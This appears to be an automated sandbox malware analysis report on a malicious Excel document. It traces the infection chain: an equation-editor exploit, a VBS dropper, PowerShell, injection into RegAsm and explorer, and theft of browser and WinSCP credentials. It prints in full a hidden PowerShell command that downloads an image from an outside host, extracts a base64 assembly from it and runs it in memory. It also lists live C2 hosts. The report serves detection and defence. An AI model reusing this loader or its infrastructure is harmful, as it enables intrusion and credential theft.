Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2972 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep count: 1575 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep count: 3764 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep time: -599704s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep time: -600000s >= -30000s (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1892 Thread sleep count: 501 > 30
Source: C:\Windows\explorer.exe TID: 1892 Thread sleep time: -50100s >= -30000s
Source: C:\Windows\explorer.exe TID: 1960 Thread sleep count: 614 > 30
Source: C:\Windows\explorer.exe TID: 1040 Thread sleep count: 771 > 30
Source: C:\Windows\explorer.exe TID: 1040 Thread sleep time: -77100s >= -30000s
Source: C:\Windows\explorer.exe TID: 1344 Thread sleep count: 32 > 30
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2584 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dagifhd TID: 1396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1928 Thread sleep count: 61 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1928 Thread sleep time: -61000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1036 Thread sleep count: 59 > 30
Source: C:\Windows\explorer.exe TID: 1036 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3184 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3184 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3220 Thread sleep count: 55 > 30
Source: C:\Windows\explorer.exe TID: 3220 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3404 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3404 Thread sleep time: -53000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1236 Thread sleep count: 52 > 30
Source: C:\Windows\explorer.exe TID: 1236 Thread sleep time: -52000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed (8 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed (6 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 19_2_000C1D4A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 19_2_000C3ED9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 19_2_000C2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose, 21_2_0008255C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose, 22_2_000815BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose, 22_2_000814D8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose, 22_2_000813FE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C6512 GetSystemInfo, 19_2_000C6512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 599704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dagifhd Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000F.00000002.625742820.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000F.00000000.464803412.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 0000000F.00000002.625742820.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock, 22_2_00081E4C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle, 22_2_000816C7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 19_2_00129247
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C1000 GetProcessHeap,RtlAllocateHeap, 19_2_000C1000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 identical entries)
Source: C:\Users\user\AppData\Roaming\dagifhd Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: dagifhd.15.dr
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.251.91.119 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: prolinice.ga
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTR
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<base64-encoded command blob removed>'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread created: C:\Windows\explorer.exe EIP: 2801960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\explorer.exe Memory written: PID: 2852 base: A5102D value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3244 base: FF31B794 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3340 base: A5102D value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 2004 base: A5102D value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 1256 base: FF31B794 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3164 base: A5102D value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3216 base: FF31B794 value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 3348 base: A5102D value: 90
Source: C:\Windows\explorer.exe Memory written: PID: 2236 base: FF31B794 value: 90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: A5102D (5 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_00081016
Source: C:\Windows\SysWOW64\explorer.exe Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_000810A5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<base64-encoded command blob removed>'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\dagifhd C:\Users\user\AppData\Roaming\dagifhd
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '<base64-encoded command blob removed>'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman-
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000F.00000002.625029054.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.464649306.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_001155EB cpuid 19_2_001155EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\dagifhd | Queries volume information: C:\Users\user\AppData\Roaming\dagifhd VolumeInformation
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,19_2_000C2112
            Source: C:\Windows\explorer.exe | Code function: 15_2_02803490 GetUserNameW,15_2_02803490
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,19_2_000C2198
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara match | File source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents\DUUDTUBZFW
            Source: C:\Windows\SysWOW64\explorer.exe | Directory queried: C:\Users\user\Documents

            Remote Access Functionality

            Source: Yara match | File source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara match | File source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (one line per tactic column, cells listed top to bottom; a number in parentheses is the count the report shows next to a technique observed in this analysis, unnumbered cells are the matrix's unobserved techniques):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Scripting (121); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Native API (11); Exploitation for Client Execution (53); Command and Scripting Interpreter (111); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: Scripting (121); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: DLL Side-Loading (1); Process Injection (623); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (141); Process Injection (623); Hidden Files and Directories (1); Dynamic API Resolution
            Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (13); System Information Discovery (127); Security Software Discovery (431); Virtualization/Sandbox Evasion (141); Process Discovery (13); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: Archive Collected Data (1); Data from Local System (11); Email Collection (1); Input Capture (11); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (115); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            Behavior Graph ID: 1502223 | Sample: 40830001.xls | Startdate: 31/08/2024 | Architecture: WINDOWS | Score: 100
            (The graph image is not reproduced here; the process chain and labels recovered from it follow.)
            Top level: contacts crash.sh; Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 20 other signatures.
            EXCEL.EXE (started): contacts 23.94.148.16 (49162, 49169, 49170; AS-COLOCROSSINGUS, United States) and crash.sh 208.64.171.230 (443, 49161, 49163; AS-CMNUS, United States); drops C:\Users\user\Desktop\40830001.xls (copy) (Composite) and inetmecangetbackwi...girlgreatday[1].doc (Rich); starts wscript.exe and WINWORD.EXE.
            taskeng.exe (started): starts dagifhd.
            wscript.exe: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures; starts powershell.exe.
            WINWORD.EXE: contacts crash.sh; drops C:\Users\user\AppData\Roaming\...\udMVqm.url (MS), C:\Users\user\AppData\...\crash.sh.url (MS), ~WRF{21E9ADCA-4DF6...E-092206FC804F}.tmp (Composite) and C:\Users\user\AppData\Local\...ADD419E.doc (Rich); Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files; starts EQNEDT32.EXE.
            powershell.exe (first): Suspicious powershell command line found; Suspicious execution chain found; starts powershell.exe.
            EQNEDT32.EXE: drops C:\...\verynicebuttersmoothcakeicream.vBs (Unicode); Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802).
            powershell.exe (second): contacts ia803104.us.archive.org 207.241.232.154 (443, 49171; INTERNET-ARCHIVEUS, United States); Writes to foreign memory regions; Injects a PE file into a foreign processes; starts RegAsm.exe.
            RegAsm.exe: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); 2 other signatures; explorer.exe (injected).
            explorer.exe (injected): contacts prolinice.ga 185.251.91.119 (49173, 49174, 80; SPRINTHOSTRU, Russian Federation); drops C:\Users\user\AppData\Roaming\dagifhd (PE32); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Hides that the sample has been downloaded from the Internet (zone.identifier); starts three further explorer.exe instances and 6 other processes.
            explorer.exe (child): contacts prolinice.ga; System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 4 other signatures.

            Source | Detection | Scanner | Label
            40830001.xls | 26% | ReversingLabs | Document-Word.Downloader.SLoad
            40830001.xls | 9% | Virustotal
            40830001.xls | 100% | Joe Sandbox ML
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
